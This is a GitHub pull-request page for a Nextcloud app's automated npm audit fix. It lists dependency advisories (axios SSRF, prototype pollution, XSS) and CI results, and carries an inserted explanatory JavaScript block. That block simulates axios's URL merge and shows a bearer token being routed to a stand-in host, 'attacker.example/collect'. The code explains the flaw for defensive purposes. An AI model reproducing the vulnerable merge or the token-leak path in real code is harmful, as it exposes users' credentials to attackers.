
Conversation

@nextcloud-command nextcloud-command (Contributor) commented Mar 9, 2025

Audit report

This audit fix resolves 18 of the total 29 vulnerabilities found in your project.

Updated dependencies

Fixed vulnerabilities

@babel/helpers

  • Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
  • Severity: moderate (CVSS 6.2)
  • Reference: GHSA-968p-4wvh-cqc8
  • Affected versions: <7.26.10
  • Package usage:
    • node_modules/@babel/helpers

@babel/runtime

  • Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
  • Severity: moderate (CVSS 6.2)
  • Reference: GHSA-968p-4wvh-cqc8
  • Affected versions: <7.26.10
  • Package usage:
    • node_modules/@babel/runtime

@nextcloud/dialogs

  • Caused by vulnerable dependency:
  • Affected versions: >=4.2.0-beta.1
  • Package usage:
    • node_modules/@nextcloud/dialogs

@nextcloud/l10n

  • Caused by vulnerable dependency:
  • Affected versions: 1.1.0 - 3.1.0
  • Package usage:
    • node_modules/@nextcloud/moment/node_modules/@nextcloud/l10n

@nextcloud/moment

  • Caused by vulnerable dependency:
  • Affected versions: >=1.1.1
  • Package usage:
    • node_modules/@nextcloud/moment

@testing-library/vue

@vitest/coverage-v8

  • Caused by vulnerable dependency:
  • Affected versions: <=2.2.0-beta.2
  • Package usage:
    • node_modules/@vitest/coverage-v8

@vitest/mocker

  • Caused by vulnerable dependency:
  • Affected versions: <=3.0.0-beta.4
  • Package usage:
    • node_modules/@vitest/mocker

@vue/test-utils

  • Caused by vulnerable dependency:
  • Affected versions: <=1.3.6
  • Package usage:
    • node_modules/@vue/test-utils

axios

  • axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
  • Severity: high
  • Reference: GHSA-jr5f-v2jv-69x6
  • Affected versions: <1.8.2
  • Package usage:
    • node_modules/axios

cypress-vite

  • Caused by vulnerable dependency:
  • Affected versions: 1.0.2 - 1.5.0
  • Package usage:
    • node_modules/cypress-vite

node-gettext

  • node-gettext vulnerable to Prototype Pollution
  • Severity: high (CVSS 5.9)
  • Reference: GHSA-g974-hxvm-x689
  • Affected versions: *
  • Package usage:
    • node_modules/node-gettext

vite

  • Caused by vulnerable dependency:
  • Affected versions: 0.11.0 - 6.1.1
  • Package usage:
    • node_modules/vite

vite-node

  • Caused by vulnerable dependency:
  • Affected versions: <=2.2.0-beta.2
  • Package usage:
    • node_modules/vite-node

vitest

  • Caused by vulnerable dependency:
  • Affected versions: 0.0.1 - 0.0.12 || 0.0.29 - 0.0.122 || 0.3.3 - 3.0.0-beta.4
  • Package usage:
    • node_modules/vitest

vue-resize

  • Caused by vulnerable dependency:
  • Affected versions: 0.4.0 - 1.0.1
  • Package usage:
    • node_modules/vue-resize

vue-template-compiler

  • vue-template-compiler vulnerable to client-side Cross-Site Scripting (XSS)
  • Severity: moderate (CVSS 4.2)
  • Reference: GHSA-g3ch-rx76-35fx
  • Affected versions: >=2.0.0
  • Package usage:
    • node_modules/vue-template-compiler

vuex

  • Caused by vulnerable dependency:
  • Affected versions: 3.1.3 - 3.6.2
  • Package usage:
    • node_modules/vuex

@nextcloud-command nextcloud-command added 3. to review dependencies Pull requests that update a dependency file labels Mar 9, 2025
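The axios entry above (GHSA-jr5f-v2jv-69x6, fixed in 1.8.2) is the one finding in this report whose mechanism is worth seeing in code. The block below is an added illustration written for this page; it is not axios code and not part of this PR. It reimplements, in miniature, the baseURL + request-URL merge that the advisory concerns, so the failure mode can be run offline: a caller-controlled absolute URL wins over the configured baseURL, and any credential the client attaches travels to that host. Function names, the strict variant that refuses absolute URLs unless opted in, and the "request path comes from user input" scenario are assumptions made for the illustration; the real library's option name and exact semantics should be taken from its changelog for 1.8.2, not from here.

```javascript
// Added example (not axios code, not part of this PR): minimal reimplementation of a
// baseURL + request-URL merge, in a legacy form that lets absolute URLs through and a
// hardened form that refuses them. Names below are assumptions for the illustration.

// "scheme://" or protocol-relative "//" counts as absolute.
const ABSOLUTE_URL = /^([a-z][a-z\d+\-.]*:)?\/\//i;

function isAbsoluteURL(url) {
  return ABSOLUTE_URL.test(url);
}

// Join a relative path onto baseURL with exactly one slash between them.
function combineURLs(baseURL, relativeURL) {
  return relativeURL
    ? baseURL.replace(/\/?\/$/, '') + '/' + relativeURL.replace(/^\/+/, '')
    : baseURL;
}

// Legacy merge: relative URLs are joined to baseURL, absolute ones pass through untouched.
// That is the SSRF / credential-leak shape: whoever controls requestedURL picks the host.
function buildFullPathLegacy(baseURL, requestedURL) {
  if (baseURL && !isAbsoluteURL(requestedURL)) {
    return combineURLs(baseURL, requestedURL);
  }
  return requestedURL;
}

// Hardened merge: with a baseURL configured, an absolute requestedURL is refused unless
// the caller explicitly opts in, so untrusted input cannot redirect the request.
function buildFullPathStrict(baseURL, requestedURL, { allowAbsoluteUrls = false } = {}) {
  if (!baseURL) return requestedURL;
  if (isAbsoluteURL(requestedURL)) {
    if (!allowAbsoluteUrls) {
      throw new Error(`absolute URL rejected while baseURL is set: ${requestedURL}`);
    }
    return requestedURL;
  }
  return combineURLs(baseURL, requestedURL);
}

// A client that always attaches a bearer token, as API wrappers commonly do.
// Returns the request it would send, so the destination host can be inspected.
function prepareRequest(client, requestedURL, buildFullPath) {
  const url = buildFullPath(client.baseURL, requestedURL);
  return {
    url,
    host: new URL(url).host,
    headers: { Authorization: `Bearer ${client.token}` },
  };
}

// Constructed scenario (assumption): an internal API client and a path taken from user input.
const client = { baseURL: 'https://api.internal.example/v1', token: 'secret-token' };

function demo(userSuppliedPath) {
  const legacy = prepareRequest(client, userSuppliedPath, buildFullPathLegacy);
  let strict;
  try {
    strict = prepareRequest(client, userSuppliedPath, buildFullPathStrict);
  } catch (err) {
    strict = { rejected: err.message };
  }
  return { legacy, strict };
}

// Benign input keeps both variants on the intended host; hostile input makes the legacy
// merge send the bearer token to attacker.example while the strict merge refuses it.
const demoOutput = [demo('users/42'), demo('https://attacker.example/collect')];
console.log(JSON.stringify(demoOutput, null, 2));
```

The check to take from this when reviewing a bump like the one in this PR: if any request path in the application is derived from user input, confirm the client refuses (or deliberately opts into) absolute URLs after the upgrade; the version bump alone only changes the default behaviour, it does not review the call sites.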
codecov bot commented Mar 9, 2025

Codecov Report

All modified and coverable lines are covered by tests ✅

Project coverage is 30.85%. Comparing base (5b28624) to head (1837795).
Report is 6 commits behind head on stable31.

Additional details and impacted files
@@            Coverage Diff            @@
##           stable31    #1908   +/-   ##
=========================================
  Coverage     30.85%   30.85%           
=========================================
  Files            43       43           
  Lines          1617     1617           
  Branches        110      110           
=========================================
  Hits            499      499           
  Misses         1092     1092           
  Partials         26       26           

cypress bot commented Mar 9, 2025

Project: Activity, Run #2358

Run Properties:
  Status: Passed #2358
  Commit: f392b38188: [stable31] Fix npm audit
  Branch: automated/noid/stable31-fix-npm-audit
  Run duration: 02m 09s
  Committer: Nextcloud Command Bot

Test results:
  Failures: 0
  Flaky: 0
  Pending (tests annotated with .skip): 0
  Skipped (failure in a mocha hook): 0
  Passing: 10

@nextcloud-command nextcloud-command force-pushed the automated/noid/stable31-fix-npm-audit branch from 602fbd2 to 909f87e Compare March 16, 2025 03:25
@miaulalala miaulalala force-pushed the automated/noid/stable31-fix-npm-audit branch from 909f87e to 521def9 Compare March 17, 2025 11:01
@miaulalala miaulalala (Collaborator) commented:

/compile /

@miaulalala miaulalala (Collaborator) commented:

/compile amend /

@nextcloud-command nextcloud-command force-pushed the automated/noid/stable31-fix-npm-audit branch from 521def9 to e7cacef Compare March 17, 2025 11:13
@nextcloud-command nextcloud-command force-pushed the automated/noid/stable31-fix-npm-audit branch from e7cacef to 1837795 Compare March 23, 2025 03:38
@artonge artonge enabled auto-merge March 24, 2025 09:17
@artonge artonge merged commit cc48b55 into stable31 Mar 24, 2025
55 of 64 checks passed
@artonge artonge deleted the automated/noid/stable31-fix-npm-audit branch March 24, 2025 09:27
@Altahrim Altahrim mentioned this pull request Apr 3, 2025